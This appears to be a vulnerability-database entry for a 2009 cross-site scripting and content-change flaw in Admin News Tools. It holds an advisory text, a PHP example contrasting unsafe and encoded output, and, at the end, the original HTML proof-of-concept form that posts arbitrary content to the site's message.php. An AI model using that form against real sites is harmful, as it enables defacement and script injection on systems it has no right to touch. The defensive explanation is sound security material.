Vendor: Admin News Tools
By: milw0rm.com
CVSS: 8,8 (HIGH)
Title: Remote Contents Change Vulnerability
CWE: 79
Product Name: Admin News Tools
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Admin News Tools Remote Contents Change Vulnerability

A vulnerability exists in Admin News Tools which can be exploited by malicious people to conduct cross-site scripting attacks. Input passed via the 'message' parameter to 'message.php' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
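
The flaw class described above, shown as an added example that is not code from Admin News Tools or from the original advisory: a hypothetical handler that returns the 'message' POST parameter unencoded, next to a version that validates it and encodes it for the HTML context. The function names, the surrounding markup and the length limit are assumptions; only the parameter name comes from the advisory.

```php
<?php
// Added illustration: a hypothetical handler, NOT the Admin News Tools source.
// Only the 'message' POST parameter name is taken from the advisory.
declare(strict_types=1);

const MAX_MESSAGE_BYTES = 2000; // assumed limit for this sketch

// "Before": the pattern the advisory describes. The value is returned
// to the browser as-is, so any markup in it becomes part of the page.
function render_message_unsafe(array $post): string
{
    return '<div class="message">' . ($post['message'] ?? '') . '</div>';
}

// "After": validate the type and size, then encode for the HTML context.
function render_message_safe(array $post): string
{
    $message = $post['message'] ?? '';
    // message[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($message) || strlen($message) > MAX_MESSAGE_BYTES) {
        http_response_code(400);
        return '<div class="message">Invalid message.</div>';
    }
    // ENT_QUOTES encodes both quote styles, so the value is also safe
    // inside an attribute; ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of returning an empty string.
    $encoded = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // Line breaks are converted only after encoding, so the <br> tags
    // are the only markup this function ever emits from user input.
    return '<div class="message">' . nl2br($encoded, false) . '</div>';
}

// Constructed sample input (harmless marker payload) for an offline run.
$sample = ['message' => "<script>alert(1)</script>\n\"quoted\" & 'single'"];

echo "unsafe: ", render_message_unsafe($sample), PHP_EOL;
echo "safe:   ", render_message_safe($sample), PHP_EOL;
```

If the stored value is later written into a different context (a JavaScript string, a URL, an HTML attribute without quotes), it needs the encoder for that context; htmlspecialchars covers element content and quoted attributes only.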

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

<html>
<!-- Securitylab.ir , info@securitylab.ir -->
<head>
</head>
<body>
<center>
<center>
<p><b><font size="+2">Admin News Tools<i> </i></font><font size="2">Remote
Contents Change Vulnerability</font></b></p>
</center>
<form action="http://site.com/news/system/message.php" method="post">
  <div><br>
  <textarea cols="89" rows="12" name="message">&lt;/textarea&gt;
  <p>
  <input value="Send"
 onclick="this.setAttribute('value','...');"
 type="submit"></p>
  </div>
  <p>Just for Fun
  </p>
  <p></p>
</form>
</center>
</body>
</html>

# milw0rm.com [2009-07-15]